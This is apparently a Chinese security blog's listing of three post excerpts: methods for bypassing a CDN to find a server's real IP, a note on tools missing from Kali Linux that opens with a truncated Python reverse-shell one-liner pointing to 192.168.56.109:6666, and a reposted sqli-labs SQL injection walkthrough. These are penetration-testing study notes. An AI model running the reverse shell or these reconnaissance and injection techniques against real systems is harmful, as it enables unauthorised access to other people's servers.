摘要:
查找二级域名 让服务器给用户发包(如 邮件) 再查看原文 找到ip 敏感文件泄露 查询历史解析ip https://www.ip138.com/ app抓包 修改hosts文件绕过 11种绕过CDN查找真实IP方法 https://www.cnblogs.com/qiudabai/p/9763739 阅读全文
摘要:
本文记录kali不包含的工具 python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.d 阅读全文
摘要:
原文地址:https://www.sqlsec.com/2020/05/sqlilabs.html 转载此处方便自己参考 Less-1 请求方式注入类型拼接方式 GET 联合、报错、布尔盲注、延时盲注 id='$id' 源码简单分析: Php $sql="SELECT * FROM users WH 阅读全文